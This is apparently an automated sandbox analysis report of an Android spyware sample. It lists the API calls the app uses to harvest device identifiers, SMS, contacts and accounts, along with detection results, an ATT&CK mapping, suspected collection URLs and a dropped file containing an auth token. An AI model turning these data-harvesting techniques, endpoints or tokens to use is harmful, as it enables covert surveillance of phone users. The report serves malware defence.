Source: com.reza.sh.deviceinfo.DiviceInfo;->isRunningOnEmulator:20Field Access: android.os.Build.BRAND
Source: com.reza.sh.deviceinfo.DiviceInfo;->isRunningOnEmulator:23Field Access: android.os.Build.DEVICE
Source: com.reza.sh.deviceinfo.DiviceInfo;->isRunningOnEmulator:25Field Access: android.os.Build.PRODUCT
Source: com.reza.sh.deviceinfo.DiviceInfo;->isRunningOnEmulator:31Field Access: android.os.Build.MANUFACTURER
Source: com.reza.sh.deviceinfo.DiviceInfo;->isRunningOnEmulator:34Field Access: android.os.Build.PRODUCT
Source: com.reza.sh.deviceinfo.DiviceInfo;->isRunningOnEmulator:37Field Access: android.os.Build.DEVICE
Source: com.reza.sh.deviceinfo.DiviceInfo;->getBoard:122Field Access: android.os.Build.BOARD
Source: com.reza.sh.deviceinfo.DiviceInfo;->getBuildBrand:132Field Access: android.os.Build.BRAND
Source: com.reza.sh.deviceinfo.DiviceInfo;->getBuildHost:138Field Access: android.os.Build.HOST
Source: com.reza.sh.deviceinfo.DiviceInfo;->getBuildID:143Field Access: android.os.Build.ID
Source: com.reza.sh.deviceinfo.DiviceInfo;->getBuildTYPE:148Field Access: android.os.Build.TYPE
Source: com.reza.sh.deviceinfo.DiviceInfo;->getBuildTags:154Field Access: android.os.Build.TAGS
Source: com.reza.sh.deviceinfo.DiviceInfo;->getBuildUser:160Field Access: android.os.Build.USER
Source: com.reza.sh.deviceinfo.DiviceInfo;->getBuildVersionRelease:175Field Access: android.os.Build$VERSION.RELEASE
Source: com.reza.sh.deviceinfo.DiviceInfo;->getDevice:220Field Access: android.os.Build.DEVICE
Source: com.reza.sh.deviceinfo.DiviceInfo;->getDisplayVersion:229Field Access: android.os.Build.DISPLAY
Source: com.reza.sh.deviceinfo.DiviceInfo;->getFingerprint:234Field Access: android.os.Build.FINGERPRINT
Source: com.reza.sh.deviceinfo.DiviceInfo;->getManufacturer:338Field Access: android.os.Build.MANUFACTURER
Source: com.reza.sh.deviceinfo.DiviceInfo;->getModel:344Field Access: android.os.Build.MODEL
Source: com.reza.sh.deviceinfo.DiviceInfo;->getOSVersion:392Field Access: android.os.Build$VERSION.RELEASE
Source: com.reza.sh.deviceinfo.DiviceInfo;->getProduct:415Field Access: android.os.Build.PRODUCT
Source: com.reza.sh.deviceinfo.DiviceInfo;->getPsuedoUniqueID:422Field Access: android.os.Build.BOARD
Source: com.reza.sh.deviceinfo.DiviceInfo;->getPsuedoUniqueID:425Field Access: android.os.Build.BRAND
Source: com.reza.sh.deviceinfo.DiviceInfo;->getPsuedoUniqueID:437Field Access: android.os.Build.CPU_ABI
Source: com.reza.sh.deviceinfo.DiviceInfo;->getPsuedoUniqueID:443Field Access: android.os.Build.DEVICE
Source: com.reza.sh.deviceinfo.DiviceInfo;->getPsuedoUniqueID:445Field Access: android.os.Build.MANUFACTURER
Source: com.reza.sh.deviceinfo.DiviceInfo;->getPsuedoUniqueID:447Field Access: android.os.Build.MODEL
Source: com.reza.sh.deviceinfo.DiviceInfo;->getPsuedoUniqueID:449Field Access: android.os.Build.PRODUCT
Source: com.google.android.gms.measurement.internal.zzfy;->call:164Field Access: android.os.Build.MODEL
Source: com.google.android.gms.measurement.internal.zzfy;->call:169Field Access: android.os.Build$VERSION.RELEASE
Source: com.google.android.gms.measurement.internal.zzhn;->zzH:337Field Access: android.os.Build$VERSION.RELEASE
Source: com.google.android.gms.measurement.internal.zzhn;->zzH:348Field Access: android.os.Build$VERSION.RELEASE
Source: com.google.android.gms.measurement.internal.zzkd;->zzC:1977Field Access: android.os.Build.MODEL
Source: com.google.android.gms.measurement.internal.zzkd;->zzC:1982Field Access: android.os.Build$VERSION.RELEASE
Source: com.google.android.gms.internal.measurement.zzey;->zza:4Field Access: android.os.Build.TYPE
Source: com.google.android.gms.internal.measurement.zzey;->zza:5Field Access: android.os.Build.TAGS
Source: anywheresoftware.b4a.phone.Phone;->getManufacturer:128Field Access: android.os.Build.MANUFACTURER
Source: anywheresoftware.b4a.phone.Phone;->getModel:129Field Access: android.os.Build.MODEL
Source: anywheresoftware.b4a.phone.Phone;->getProduct:130Field Access: android.os.Build.PRODUCT
Source: com.google.android.gms.common.util.DeviceProperties;->isUserBuild:43Field Access: android.os.Build.TYPE
Source: androidx.core.view.DisplayCompat;->isSonyBravia4kTv:32Field Access: android.os.Build.MANUFACTURER
Source: androidx.core.view.DisplayCompat;->isSonyBravia4kTv:35Field Access: android.os.Build.MODEL
Source: Lkotlin/reflect/KTypeProjection$Companion;->invariant(Lkotlin/reflect/KType;)Lkotlin/reflect/KTypeProjection;Method string: "type"
Source: Lanywheresoftware/b4a/phone/PhoneEvents$11;->handle(Landroid/content/Intent;)VMethod string: "phone"
Source: Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->resume(Lanywheresoftware/b4a/BA;[Ljava/lang/Object;)VMethod string: "model"
Source: Lkotlin/concurrent/TimersKt;->schedule(Ljava/util/Timer;Ljava/util/Date;Lkotlin/jvm/functions/Function1;)Ljava/util/TimerTask;Method string: "time"
Source: Lcom/reza/sh/deviceinfo/DiviceInfo;->isRunningOnEmulator()ZMethod string: "sdk"
Source: Landroidx/localbroadcastmanager/content/LocalBroadcastManager;->sendBroadcast(Landroid/content/Intent;)ZMethod string: "category"
Source: com.reza.sh.deviceinfo.DiviceInfo;->getAndroidID:71API Call: android.provider.Settings.Secure.getString
Source: com.reza.sh.deviceinfo.DiviceInfo;->getIMEI:278API Call: android.provider.Settings$Secure.getString
Source: com.google.android.datatransport.cct.CctTransportBackend;->decorate:305API Call: android.telephony.TelephonyManager.getSimOperator
Source: anywheresoftware.b4a.phone.Phone;->GetSimOperator:56API Call: android.telephony.TelephonyManager.getSimOperator
Source: Lcom/reza/sh/deviceinfo/DiviceInfo;->isDeviceRooted()ZMethod string: "/sbin/", "su" and API call "File.exists" in same context
Source: com.google.android.gms.internal.measurement.zzey;->zza:13API Call: java.lang.String.contains("test-keys")
Source: com.reza.sh.deviceinfo.DiviceInfo;->getCarrier:185API Call: android.telephony.TelephonyManager.getNetworkOperatorName returned "T-Mobile Deutschland GmbH"
Source: anywheresoftware.b4a.phone.Phone;->GetNetworkOperatorName:15API Call: android.telephony.TelephonyManager.getNetworkOperatorName
Source: com.reza.sh.deviceinfo.DiviceInfo;->getIMEI:273API Call: android.telephony.TelephonyManager.getDeviceId
Source: com.reza.sh.deviceinfo.DiviceInfo;->getIMSI:289API Call: android.telephony.TelephonyManager.getSubscriberId
Source: com.reza.sh.deviceinfo.DiviceInfo;->getPhoneNo:406API Call: android.telephony.TelephonyManager.getLine1Number
Source: com.reza.sh.deviceinfo.DiviceInfo;->getPhoneNo:407API Call: android.telephony.TelephonyManager.getLine1Number
Source: com.reza.sh.deviceinfo.DiviceInfo;->getSIMSerial:490API Call: android.telephony.TelephonyManager.getSimSerialNumber
Source: anywheresoftware.b4a.phone.Phone$PhoneId;->GetDeviceId:5API Call: android.telephony.TelephonyManager.getDeviceId
Source: anywheresoftware.b4a.phone.Phone$PhoneId;->GetLine1Number:10API Call: android.telephony.TelephonyManager.getLine1Number
Source: anywheresoftware.b4a.phone.Phone$PhoneId;->GetSimSerialNumber:15API Call: android.telephony.TelephonyManager.getSimSerialNumber
Source: anywheresoftware.b4a.phone.Phone$PhoneId;->GetSubscriberId:20API Call: android.telephony.TelephonyManager.getSubscriberId
Source: com.reza.sh.deviceinfo.DiviceInfo;->getCountry:197API Call: android.telephony.TelephonyManager.getSimCountryIso
Source: com.reza.sh.deviceinfo.DiviceInfo;->getWifiMAC:573API Call: android.net.wifi.WifiInfo.getMacAddress

Stealing of Sensitive Information

barindex
Source: Yara matchFile source: android.memstr, type: MEMORYSTR
Source: com.reza.sh.deviceinfo.DiviceInfo;->getCountry:196API Call: android.telephony.TelephonyManager.getSimState
Source: com.reza.sh.deviceinfo.DiviceInfo;->getNetworkType:364API Call: android.telephony.TelephonyManager.getSimState
Source: anywheresoftware.b4a.phone.PhoneEvents$SMSInterceptor;->ListenToOutgoingMessages:15API Call: android.net.Uri.parse("content://sms")
Source: anywheresoftware.b4a.phone.SmsWrapper;->get:13API Call: android.net.Uri.parse("content://sms")
Source: submitted apkRequest permission: android.permission.READ_SMS
Source: anywheresoftware.b4a.phone.Contacts2Wrapper$Contact2;->GetPhones:22Field access: android.provider.ContactsContract$CommonDataKinds$Phone.CONTENT_URI
Source: anywheresoftware.b4a.phone.Contacts2Wrapper;->getAllContacts:36Field access: android.provider.ContactsContract$CommonDataKinds$Phone.CONTENT_URI
Source: .newmessage1$newmessage1_BRRegistered receiver: android.provider.Telephony.SMS_RECEIVED
Source: anywheresoftware.b4a.phone.PackageManagerWrapper;->GetInstalledPackages:17API Call: android.content.pm.PackageManager.getInstalledPackages
Source: com.MrXnxVip.global.newmessage1;->GET:162API Call: android.telephony.SmsManager.createFromPdu
Source: com.MrXnxVip.global.newmessage1;->GET:162API Call: android.telephony.SmsManager.createFromPdu
Source: anywheresoftware.b4a.phone.PhoneEvents$SMSInterceptor$2;->onReceive:8API Call: android.telephony.SmsMessage.createFromPdu
Source: anywheresoftware.b4a.phone.PhoneEvents$15;->handle:6API Call: android.content.Intent.getStringExtra
Source: com.MrXnxVip.global.newmessage1;->GET:163API Call: android.telephony.SmsMessage.getMessageBody
Source: com.MrXnxVip.global.newmessage1;->GET:165API Call: android.telephony.SmsMessage.getOriginatingAddress
Source: anywheresoftware.b4a.phone.PhoneEvents$SMSInterceptor$2;->onReceive:17API Call: android.telephony.SmsMessage.getOriginatingAddress
Source: anywheresoftware.b4a.phone.PhoneEvents$SMSInterceptor$2;->onReceive:18API Call: android.telephony.SmsMessage.getMessageBody
Source: submitted apkRequest permission: android.permission.RECEIVE_SMS
Source: anywheresoftware.b4a.phone.Contacts2Wrapper$Contact2;->GetEmails:4Field access: android.provider.ContactsContract$CommonDataKinds$Email.CONTENT_URI
Source: anywheresoftware.b4a.phone.Contacts2Wrapper;->FindByMail:103Field access: android.provider.ContactsContract$CommonDataKinds$Email.CONTENT_URI
Source: com.reza.sh.deviceinfo.DiviceInfo;->getAccounts:58API Call: android.accounts.Account.name
Source: com.reza.sh.deviceinfo.DiviceInfo;->getAccounts:57API Call: android.accounts.AccountManager.getAccountsByType

Remote Access Functionality

barindex
Source: Yara matchFile source: android.memstr, type: MEMORYSTR
Source: Lanywheresoftware/b4a/phone/Phone$VoiceRecognition;->Listen2(Lanywheresoftware/b4a/BA;Landroid/content/Intent;)VMethod: Various indicators of Irata
Source: com.MrXnxVip.global.newmessage1;->_service_start:30API Call: java.lang.String.equals android.provider.Telephony.SMS_RECEIVED
Source: com.MrXnxVip.global.pnservices;->_pnreciver_onreceive:61API Call: java.lang.String.equals android.provider.Telephony.SMS_RECEIVED
Source: anywheresoftware.b4a.phone.PhoneEvents$SMSInterceptor$2;->onReceive:4API Call: java.lang.String.equals android.provider.Telephony.SMS_RECEIVED
Source: Lkotlin/collections/unsigned/UArraysKt___UArraysKt;->reverse-rL5Bavg([S)VMethod string: "$this$reverse"
Source: Lcom/MrXnxVip/global/main$ResumableSub_Activity_PermissionResult;->resume(Lanywheresoftware/b4a/BA;[Ljava/lang/Object;)VMethod string: "android.permission.send_sms"
Source: Lkotlin/collections/CollectionsKt___CollectionsJvmKt;-><init>()VInstruction: "lkotlin/collections/collectionskt__reversedviewskt;-><init>()v"
Source: Lanywheresoftware/b4a/phone/CallLogWrapper;->GetAll(I)Lanywheresoftware/b4a/objects/collections/List;Instruction: "lanywheresoftware/b4a/phone/calllogwrapper;->getallcalls(ljava/lang/string;[ljava/lang/string;i)lanywheresoftware/b4a/objects/collections/list;"
Source: Lcom/MrXnxVip/global/main$ResumableSub_Activity_PermissionResult;->resume(Lanywheresoftware/b4a/BA;[Ljava/lang/Object;)VInstruction: "const-string v2, "android.permission.send_sms""
Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsWindows Management InstrumentationPath InterceptionPath Interception1
Obfuscated Files or Information
2
Capture SMS Messages
1
System Network Connections Discovery
Remote Services1
Access Contact List
Exfiltration Over Other Network MediumData Obfuscation1
Exploit SS7 to Redirect Phone Calls/SMS
Remotely Track Device Without Authorization1
Delete Device Data
Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkit2
Access Stored Application Data
2
System Network Configuration Discovery
Remote Desktop Protocol1
Location Tracking
Exfiltration Over BluetoothJunk DataExploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without Authorization1
Carrier Billing Fraud
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account Manager1
Location Tracking
SMB/Windows Admin Shares1
Network Information Discovery
Automated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Binary PaddingNTDS2
System Information Discovery
Distributed Component Object Model2
Capture SMS Messages
Scheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets1
System Network Configuration Discovery
SSH2
Access Stored Application Data
Data Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain Credentials1
Process Discovery
VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


android-buttoncam-android
SourceDetectionScannerLabelLink
LVgBOPCpI044%ReversingLabsAndroid.Trojan.Generic
LVgBOPCpI0100%AviraANDROID/Spy.Agent.GAAP.Gen
LVgBOPCpI054%VirustotalBrowse
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://app-measurement.com/a0%URL Reputationsafe
No contacted domains info
NameSourceMaliciousAntivirus DetectionReputation
http://schemas.android.com/apk/res/androidnotification_action.xml, androidfalse
    high
    https://goo.gl/NAOOOIclasses.dex, androidfalse
      high
      https://ssd-vip.website/lord/web.txtandroidfalse
        unknown
        https://app-measurement.com/aclasses.dex, androidfalse
        • URL Reputation: safe
        unknown
        https://goo.gl/J1sWQyclasses.dex, androidfalse
          high
          https://publicsuffix.org/list/public_suffix_list.datNOTICEfalse
            unknown
            https://goo.gl/NAOOOI&Missingclasses.dexfalse
              high
              https://goo.gl/NAOOOI.classes.dex, androidfalse
                high
                https://mozilla.org/MPL/2.0/NOTICEfalse
                  high
                  https://ssd-vip.website/androidfalse
                    unknown
                    https://adl-jv.my03.com/rat.php1.drfalse
                      unknown
                      https://ssd-vip.website/lord/log.phpandroidfalse
                        unknown
                        No contacted IP infos
                        Joe Sandbox Version:38.0.0 Ammolite
                        Analysis ID:1319345
                        Start date and time:2023-10-04 11:48:22 +02:00
                        Joe Sandbox Product:CloudBasic
                        Overall analysis duration:0h 6m 6s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:defaultandroidfilecookbook.jbs
                        Analysis system description:Android 12 (Snow Cone)
                        Run name:Potential for more IOCs and behavior
                        Analysis Mode:default
                        APK Instrumentation enabled:true
                        Sample file name:LVgBOPCpI0
                        Original Sample Name:2795bd8258cc8f0daa85db873c9f7e6126ec41f92a27970278b12ea4db5a4964
                        Detection:MAL
                        Classification:mal80.troj.spyw.evad.and@0/264@0/0
                        • Not all executed log events are in report (maximum 10 identical API calls)
                        • Not all non-executed APIs are in report
                        • Report size exceeded maximum capacity and may have missing behavior information.
                        • Report size exceeded maximum capacity and may have missing disassembly code.
                        • Report size exceeded maximum capacity and may have missing dynamic data code.
                        • Skipping network analysis since amount of network traffic is too extensive
                        No context
                        No context
                        No context
                        No context
                        No context
                        File Type:troff or preprocessor input, ASCII text, with very long lines (666)
                        Category:dropped
                        Size (bytes):676
                        Entropy (8bit):3.344236713862367
                        Encrypted:false
                        SSDEEP:12:RAHY2tZOS8tnGpn05AZgZD6UPNy7AVeYbLP8ZeqypDizOR9RRT2R7A15:S4cv+ndAZgZDXNMABv9pmqD
                        MD5:98922A00534B210D456A1C6A29203720
                        SHA1:64C9B0B7E5DBF69037737C89CDCCAE5DD3700126
                        SHA-256:2C8F5EDC25FDD1976939AE39D1985360EA6480B95602442BC924F225C428BCE1
                        SHA-512:1AD0D1E0DAC6621668091E351B9C0817245B0C2E500AF8E3A39F316FD0FACF492EEAC42246DD17627DFC00D281C48DFEB9DA73B03A4449146E202CE27E76823E
                        Malicious:false
                        Reputation:low
                        Preview:\"uptime\.\"709870\\"709894\\"709896\\"709898\\"709900\\"709901\\"709902\\"709912\\"709914\\"709917\\"709932\\"709935\\"709939\\"709940\\"709943\\"709945\\"709947\\"709950\\"709951\\"709957\\"709962\\"709965\\"709960\\"709975\\"709976\\"709980\\"709984\\"709984\\"710073\\"710076\\"709985\\"710086\\"716027\\"716031\\"716035\\"716040\\"716045\\"716051\\"716061\\"716075\\"716078\\"716083\\"716090\\"716094\\"716097\\"716101\\"716103\\"716104\\"716106\\"716111\\"716113\\"716127\\"716165\\"716171\\"716162\\"716263\\"716270\\"716271\\"716272\\"716273\\"716274\\"716275\\"716273\\"716277\\"722886\\"722962\\"723274\\"723324\\"723336\\"723340\\"723350\\"723359\\"723363\\"723371\
                        File Type:data
                        Category:dropped
                        Size (bytes):25
                        Entropy (8bit):4.213660689688185
                        Encrypted:false
                        SSDEEP:3:DI5kSJn:8lJn
                        MD5:6B0243F7CEE3CF0FB99FF3F45BF7B2F1
                        SHA1:EE801251550B0C9005E9742B062F6361568FD8C2
                        SHA-256:F96422F37682D3EE0DDFE48FBA561D2DA3F2663D338BEF50B3B355D93B608AE8
                        SHA-512:38E96ED3C33C03ED1F2EB69F0335FD3EEB146E246B7E37B05861486CEAF4194B56E668DB29EF58EDA135EFFC86ABEE5B03E6E281552A4253E6EA79E025E38A8C
                        Malicious:false
                        Reputation:low
                        Preview:...)..com.MrXnxVip.global
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):31
                        Entropy (8bit):4.147114052043201
                        Encrypted:false
                        SSDEEP:3:N8iuKt2V:2iunV
                        MD5:E93A62037B9F82D2A5A5F9300A1B6770
                        SHA1:DFC795CAC4FA01A4F75CD9EA664640871540EBEB
                        SHA-256:1CC23510BAB9B13A7C4F08EDB8E28CB9100B752F288445E6D895C4836C079624
                        SHA-512:84A4DFDAC02C6307481FB0A62D064D54BF62D421B3EC5DBA073BB740AF91DEC90D04D41CDD99918B16A96E82029BC3FF02B6C5E723E5C3C137A5C95910F9E5D2
                        Malicious:false
                        Reputation:low
                        Preview:https://adl-jv.my03.com/rat.php
                        File Type:HTML document, ASCII text
                        Category:dropped
                        Size (bytes):690
                        Entropy (8bit):4.904336911098556
                        Encrypted:false
                        SSDEEP:12:J0+szeRm4A9etNzRxGez5nfCTjsKtgizRbAGEE0+szeRm4A9etNzRxGez5nfCTjT:oeRmV9etxv5fCTjsuRUjeRmV9etxv5f+
                        MD5:BDD89B9D5F598FF13F4D9EAECFE86033
                        SHA1:FC4926068A2C242847710DD623F0A60E3B405E70
                        SHA-256:CF40A58B3B009116D3469EBB16808827519F22EB6216AA9DD2740C389199EA79
                        SHA-512:F74423FA0D082F4E011C3E60ABC2F81825E872E6A78EE30D9C4A7B2B357F4CAD0A4921789538554194CBFA4F3A9D99713676CD29F7941BCDCD4CC891455B4B88
                        Malicious:false
                        Reputation:moderate, very likely benign file
                        Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>..<head>. <title>404 Not Found</title>.</head>..<body>. <h1>Not Found</h1>. <p>The requested URL was not found on this server.</p>. <p>Additionally, a 404 Not Found. error was encountered while trying to use an ErrorDocument to handle the request.</p>.</body>..</html>.<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>..<head>. <title>404 Not Found</title>.</head>..<body>. <h1>Not Found</h1>. <p>The requested URL was not found on this server.</p>. <p>Additionally, a 404 Not Found. error was encountered while trying to use an ErrorDocument to handle the request.</p>.</body>..</html>.
                        File Type:data
                        Category:dropped
                        Size (bytes):40
                        Entropy (8bit):3.254162526001658
                        Encrypted:false
                        SSDEEP:3:FkXri7b7On:+ain
                        MD5:E98F0382D3EEF4B83A292009CDC40487
                        SHA1:B7895F2E95551757859E1099186CBDB471502666
                        SHA-256:DD3D719C2A53497B4C45ECD644BA09973B8D7A7F3177504337977E027EB17C2D
                        SHA-512:8D4EC54AC30426F667C79D3F22314E7B956D04D8C582F99E26280DC15A81D80028303C5838C2FBAA8645E2E649E996D5A9A5DA6A19E2386952CCC03D40F330DE
                        Malicious:false
                        Reputation:low
                        Preview:sdPC.......................U^..O...v0|.^
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):4
                        Entropy (8bit):1.5
                        Encrypted:false
                        SSDEEP:3:Hn:Hn
                        MD5:098F6BCD4621D373CADE4E832627B4F6
                        SHA1:A94A8FE5CCB19BA61C4C0873D391E987982FBBD3
                        SHA-256:9F86D081884C7D659A2FEAA0C55AD015A3BF4F1B2B0B822CD15D6C15B0F00A08
                        SHA-512:EE26B0DD4AF7E749AA1A8EE3C10AE9923F618980772E473F8819A5D4940E0DB27AC185F8A0E1D5F84F88BC887FD67B143732C304CC5FA9AD8E6F57F50028A8FF
                        Malicious:false
                        Reputation:moderate, very likely benign file
                        Preview:test
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):10
                        Entropy (8bit):2.6464393446710153
                        Encrypted:false
                        SSDEEP:3:au/:au/
                        MD5:68E109F0F40CA72A15E05CC22786F8E6
                        SHA1:DB8AC1C259EB89D4A131B253BACFCA5F319D54F2
                        SHA-256:872E4E50CE9990D8B041330C47C9DDD11BEC6B503AE9386A99DA8584E9BB12C4
                        SHA-512:8AE6AE71A75D3FB2E0225DEEB004FAF95D816A0A58093EB4CB5A3AA0F197050D7A4DC0A2D5C6FBAE5FB5B0D536A0A9E6B686369FA57A027687C3630321547596
                        Malicious:false
                        Reputation:moderate, very likely benign file
                        Preview:HelloWorld
                        File Type:JSON data
                        Category:dropped
                        Size (bytes):569
                        Entropy (8bit):5.910218675543026
                        Encrypted:false
                        SSDEEP:12:Y1uK7SpCAcLCk7KBhNPrmZLDeggLbV4+DAUfySL8kPLyO0:Y1uK7uXaChQPm2+EU6SL8ib0
                        MD5:F0E244C6480060A74E80A13AE894F5D8
                        SHA1:BD1174842C463BAD0B8ED8F3C9DB86B44A52F97F
                        SHA-256:E66EEC7009460AFF649900E04BA42F54D1A46E02AAF9376E7539022EFABE9C9E
                        SHA-512:6141ACC30786E1E5CA26C603A2A60134DDDF0DA0291CA26C509B72FF49DF9D6EAE44CBE622D85076D6E155AF1BA27B0770524A60B6C27770FA2E849A253CE8D0
                        Malicious:false
                        Reputation:low
                        Preview:{"Fid":"d9xwbLNgRIa-GJ0ARZ7KzJ","Status":3,"AuthToken":"eyJhbGciOiJFUzI1NiIsInR5cCI6IkpXVCJ9.eyJhcHBJZCI6IjE6NTQ0NzgyMjg3NjcxOmFuZHJvaWQ6MDVjYmQwOGIxZTBhM2FiNWZhOTBiMiIsImV4cCI6MTY5NzAxNzc4MCwiZmlkIjoiZDl4d2JMTmdSSWEtR0owQVJaN0t6SiIsInByb2plY3ROdW1iZXIiOjU0NDc4MjI4NzY3MX0.AB2LPV8wRQIgG3nZ6E1Ipj9WBW4qyjdbd41HxX1l9GCLgypg8geur5cCIQCelEiGrjM7leXD6IGU0L5-CpyCyXhMi8sSwAbQ8iykTg","RefreshToken":"3_AS3qfwKb0nDu8SpNao4h1cmOr5n6Ew7WsNGNfmnDVKFrrsLXQ9SE1i2yE4wjpMmSRNnXjwLbH5QZik0cTNSooZPLi5s0s4QGGNuFQF9zHR8J2VM","TokenCreationEpochInSecs":1696412980,"ExpiresInSecs":604800}
                        File Type:empty
                        Category:dropped
                        Size (bytes):0
                        Entropy (8bit):0.0
                        Encrypted:false
                        SSDEEP:3::
                        MD5:D41D8CD98F00B204E9800998ECF8427E
                        SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                        SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                        SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                        Malicious:false
                        Reputation:high, very likely benign file
                        Preview:
                        File Type:XML 1.0 document, ASCII text
                        Category:dropped
                        Size (bytes):138
                        Entropy (8bit):5.011660389970175
                        Encrypted:false
                        SSDEEP:3:vFWWMNCmXyKgCrT1ELAopLqoWYZDHxyFRLiH5jAiEj/WWLn:TM3iWT1jopLqnYt4FRLiH5jA3jh
                        MD5:FDC234B1EB347B095DDC6C7233EA3ABB
                        SHA1:2DC29E4E7068C04E6298808930D07A8A623FFE11
                        SHA-256:5F285ACF291715939C3DF4BA51B6019B497DF152B3EB32A84B861A92E577C1D0
                        SHA-512:5F41405E52D7B91DF906A91A6BDE39C8325237E3B31722195379D8026C0F55A4B062AB083DE801BB981DCA5B1E2C81A5E213233B408E215ECA2602566B329152
                        Malicious:false
                        Preview:<?xml version='1.0' encoding='utf-8' standalone='yes' ?>.<map>. <long name=\"fire-installations-id\" value=\"1696412979300\" />.</map>.
                        File Type:troff or preprocessor input, ASCII text, with very long lines (4212)
                        Category:dropped
                        Size (bytes):4222
                        Entropy (8bit):3.2621802069159545
                        Encrypted:false
                        SSDEEP:96:hic2CA1TkJi3ITD7w569f8vci+jWfaFGfekhs4z/JPBsMDAS2aAdGmc5DKnaI9xG:hic2WY569f80i+qfaFGfekhs4z/JPGpY
                        MD5:EE057061BB6527CBBD2C52524E4AECA0
                        SHA1:95F626D6550D1841384132B2DB7451BAAECECA13
                        SHA-256:F06D486D2A2610158D0017729D476EA3494D769EDE0663E7D65B04E0B507A717
                        SHA-512:35579052339EC333F8D9A5D4811BDDF94CA651FFBBACDDB9C6B9138CE1D55FCDEF3EBD00C2F9BC63D7B9AA6C4BDD0F79AEC8B68C204628364BF33D6438414302
                        Malicious:false
                        Preview:\"uptime\.\"684714\\"684729\\"684731\\"684733\\"684735\\"684737\\"684738\\"684740\\"684741\\"684743\\"684744\\"684745\\"684747\\"684749\\"684751\\"684752\\"684754\\"684757\\"684758\\"684763\\"684764\\"684766\\"684767\\"684768\\"684770\\"684771\\"684772\\"684773\\"684774\\"684775\\"684776\\"684778\\"684779\\"684780\\"684781\\"684783\\"684784\\"684785\\"684786\\"684787\\"684788\\"684789\\"684790\\"684791\\"684792\\"684793\\"684794\\"684795\\"684796\\"684797\\"684798\\"684799\\"684806\\"684819\\"684820\\"684822\\"684823\\"684824\\"684828\\"684829\\"684833\\"684834\\"684835\\"684837\\"684838\\"684839\\"684840\\"684842\\"684845\\"684848\\"684849\\"684850\\"684851\\"684852\\"684854\\"684855\\"684856\\"684858\\"684859\\"684861\\"684864\\"684866\\"684870\\"684871\\"684872\\"684873\\"684874\\"684875\\"684878\\"684879\\"684880\\"684881\\"684882\\"684882\\"684883\\"684884\\"684885\\"684886\\"684887\\"684888\\"684889\\"684889\\"684890\\"684891\\"684892\\"684893\\"684894\\"684895\\"684895\\"684896\
                        File Type:troff or preprocessor input, ASCII text, with very long lines (765)
                        Category:dropped
                        Size (bytes):775
                        Entropy (8bit):3.205747553373601
                        Encrypted:false
                        SSDEEP:12:ycAZwoSyVA5sjSM5nRrpZ6ZQ5gXH/eN0TfTfx6WmGq5nsLg5Rq3Hc:xXH5suaRrX0RD7JQnsL8r
                        MD5:BEDB40DE5ED2BDBF88BA7A9568C065C9
                        SHA1:93C3D0BD313B64E46B9781EF281E361BDE3D9308
                        SHA-256:3F8B82F1F7D6C8E6BF8CFBEF57C9E4E4B075BAC20D29CCECB34ACA9B9C2BB564
                        SHA-512:6C585C73C5C8F82F8DFBAEFB658113F0CC25A8993A46D8C2B1C6D757FCA7A7E51C2EB7399ABB240195BE565A8191151BE78D75444F081C3797CABDEACC5B7598
                        Malicious:false
                        Preview:\"uptime\.\"697777\\"697917\\"697946\\"698020\\"698152\\"698222\\"698063\\"697978\\"700181\\"700182\\"700185\\"700204\\"700206\\"700208\\"700210\\"700214\\"700215\\"700216\\"700217\\"700219\\"700220\\"700223\\"700226\\"700508\\"700510\\"700513\\"700543\\"700544\\"700545\\"700546\\"700548\\"700549\\"700550\\"700550\\"700551\\"700552\\"700553\\"700554\\"700556\\"700556\\"700557\\"700558\\"700559\\"700560\\"700561\\"700562\\"700563\\"700564\\"700565\\"700566\\"700566\\"700567\\"700549\\"702713\\"702715\\"702716\\"702717\\"702718\\"702719\\"702720\\"702721\\"702723\\"702724\\"702727\\"702728\\"702729\\"702729\\"702731\\"702732\\"702732\\"702735\\"702736\\"702737\\"702740\\"702741\\"702739\\"702743\\"702744\\"702745\\"702746\\"702747\\"702749\\"702750\\"702747\\"702751\
                        File Type:troff or preprocessor input, ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):133
                        Entropy (8bit):3.47135448701393
                        Encrypted:false
                        SSDEEP:3:emDZUqnAmDZUqnAmDZUqnAmDZUqnAmDZUqnAmDZUqnAmDZUq5:emDqqnAmDqqnAmDqqnAmDqqnAmDqqnAG
                        MD5:5FED487F2A51825D14BF0D6EC9A36EAF
                        SHA1:351439A3D2E0DC9FA6F70E90516F04F3648AADE6
                        SHA-256:E923D2381244AA3F362CC284734AFCB0CD3F911803A5684D15E75E314FCD8A84
